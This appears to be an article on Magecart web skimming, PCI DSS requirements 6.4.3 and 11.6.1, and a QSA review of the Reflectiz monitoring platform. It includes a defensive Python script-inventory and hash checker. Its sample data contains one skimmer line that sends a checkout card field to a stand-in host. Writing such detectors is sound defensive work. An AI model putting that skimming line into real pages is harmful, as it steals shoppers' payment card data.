Sansec has counted more than 100,000 sites hit by web skimming and supply-chain attacks.
Magecart and the crowded checkout page
When a customer types their card number into a checkout, the browser usually runs far more than the merchant’s own code. Analytics tags, tag managers, support widgets and payment iframes mean a modern checkout can load dozens of third‑party scripts — and any one of those scripts can be turned into a skimmer. That is how Magecart-style attacks operate: attackers compromise a third‑party vendor and the malicious payload rides in on a script the merchant has already been running. Nothing on the page looks new; the script’s behavior changes.
PCI DSS v4.0.1 requirements 6.4.3 and 11.6.1 — what they demand
PCI DSS v4.0.1 addresses this specific gap with two requirements now fully in force. Requirement 6.4.3 requires merchants to inventory every payment‑page script, authorize it, and prove its integrity. Requirement 11.6.1 requires detection of tampering with page content and HTTP headers as the browser receives them. Taken together, the controls move the standard beyond static file checks toward detection of malicious behavior at the page level.
That is a nontrivial operational lift: Reflectiz observed that roughly 30% of payment‑page scripts change within any two‑week window, and a manual, page‑by‑page process does not scale across hundreds of frequently changing third‑party assets.
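As an added illustration (not the page's own material and not Reflectiz or Integrity360 code), the following Python check shows the two requirements at their most basic: it inventories every external script on a constructed checkout page, compares each script body's SRI-style hash with the baseline recorded when the script was authorized (6.4.3), and reports security headers that arrive altered (11.6.1). All hosts, script bodies and header values are constructed samples.

```python
import base64
import hashlib
import re

# Constructed sample data. Script bodies as they were when reviewed and authorized (6.4.3).
AUTHORIZED_BODIES = {
    "https://cdn.example-analytics.test/tag.js":
        b"window.track = function (e) { /* send page view */ };",
    "https://pay.example-psp.test/iframe-loader.js":
        b"document.getElementById('pay').src = 'https://pay.example-psp.test/frame';",
}
# Bodies as served today: the analytics tag was swapped vendor-side, same URL, to read the card field.
CURRENT_BODIES = {
    "https://cdn.example-analytics.test/tag.js":
        b"window.track = function (e) { fetch('https://x.test/?c=' + document.querySelector('#card').value); };",
    "https://pay.example-psp.test/iframe-loader.js":
        AUTHORIZED_BODIES["https://pay.example-psp.test/iframe-loader.js"],
}
# The checkout page as the browser receives it; chat.js was never authorized.
CHECKOUT_HTML = """<html><head>
<script src="https://cdn.example-analytics.test/tag.js"></script>
<script src="https://pay.example-psp.test/iframe-loader.js"></script>
<script async src="https://widgets.example-chat.test/chat.js"></script>
</head><body><form><input id="card"></form></body></html>"""
# Security headers approved at authorization time versus those received now (11.6.1).
BASELINE_HEADERS = {"content-security-policy": "script-src 'self' https://cdn.example-analytics.test https://pay.example-psp.test"}
RECEIVED_HEADERS = {"content-security-policy": "script-src 'self' https: 'unsafe-inline'"}

def sri_hash(body: bytes) -> str:
    """Subresource-Integrity style value (sha384, base64) for one script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body).digest()).decode()

def inventory_scripts(html: str) -> list[str]:
    """Enumerate every external script the payment page loads, in document order."""
    return re.findall(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', html, flags=re.I)

def check_scripts(html: str, authorized: dict, current: dict) -> list[tuple[str, str]]:
    """6.4.3: each loaded script must be in the authorized inventory and unchanged."""
    baseline = {src: sri_hash(body) for src, body in authorized.items()}
    findings = []
    for src in inventory_scripts(html):
        if src not in baseline:
            findings.append((src, "unauthorized"))
        elif sri_hash(current.get(src, b"")) != baseline[src]:
            findings.append((src, "integrity-changed"))
    return findings

def check_headers(baseline: dict, received: dict) -> list[str]:
    """11.6.1: report headers that are missing or altered as the browser received them."""
    return [name for name, value in baseline.items() if received.get(name) != value]
```

A hash comparison like this only catches a swap when the body the checker fetched is the body the browser ran, which is why the article stresses watching what a script does on the page in addition to what it hashes to.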
Integrity360 Europe’s QSA assessment of the Reflectiz PCI DSS Platform
Integrity360 Europe, a PCI Qualified Security Assessor and a member of the PCI SSC Global Executive Assessor Roundtable, reviewed the Reflectiz PCI DSS Platform against requirements 6.4.3 and 11.6.1 and judged it capable of effectively supporting compliance. The assessor highlighted three practical capabilities:
- Behavioral detection rather than only file hashes — Reflectiz watches script behavior and can catch a script the moment it begins to reach for card data, whereas a hash check can miss a vendor‑side swap that does not change the delivered filename.
- Agentless deployment — the platform requires no code changes or snippets, can be operational in days, and continues to function through refactors and CMS migrations.
- QSA‑ready evidence in one click — the platform produces a full audit trail per page suitable for assessment, according to the QSA review.
SAQ A, iframes, and PCI SSC FAQ #1588
Since January 2025, merchants filing the SAQ A self‑assessment questionnaire may omit controls 6.4.3 and 11.6.1 only if they confirm their site is not susceptible to script attacks. The assessment guidance notes that a full redirect to a payment processor generally meets that condition. But merchants that embed a payment iframe must still consider exposure on the parent page: a script running on the parent page can hijack the checkout before data reaches the secure frame, and the merchant must demonstrate that this cannot occur. PCI SSC FAQ #1588 directs merchants back to the same controls.
What this means for technologists, procurement leaders, and QSAs
- Technologists and security teams: the record from the QSA review emphasizes behavioral monitoring rather than static hashes — teams will need approaches that detect when a previously trusted script begins to access card data, because roughly 30% of payment‑page scripts change within two weeks.
- Merchants and procurement leaders: the SAQ A carve‑out narrows the circumstances where controls can be omitted, and iframe merchants must produce proof that parent‑page scripts cannot exfiltrate payment data. Inventorying and authorizing every payment‑page script — and retaining evidence — becomes a procurement as well as a technical task.
- QSAs and the PCI SSC community: Integrity360 Europe’s assessment and the accompanying white paper are positioned as blueprints for producing the evidence QSAs will expect — a line‑by‑line breakdown of the controls, a monitoring workflow, and specifics of what SAQ A now requires of iframe merchants.
The practical upshot is crisp: checkout pages are now explicitly within the perimeter that PCI DSS treats as security‑critical, and the new controls aim to catch behavioral changes that static checks miss. For organizations wrestling with hundreds of changing third‑party scripts, the Integrity360 review says an agentless, behavior‑focused platform can provide both detection and the audit trail a QSA will seek. The complete Integrity360 Europe white paper details both requirements line by line, the monitoring workflow, and exactly what SAQ A now demands of iframe merchants.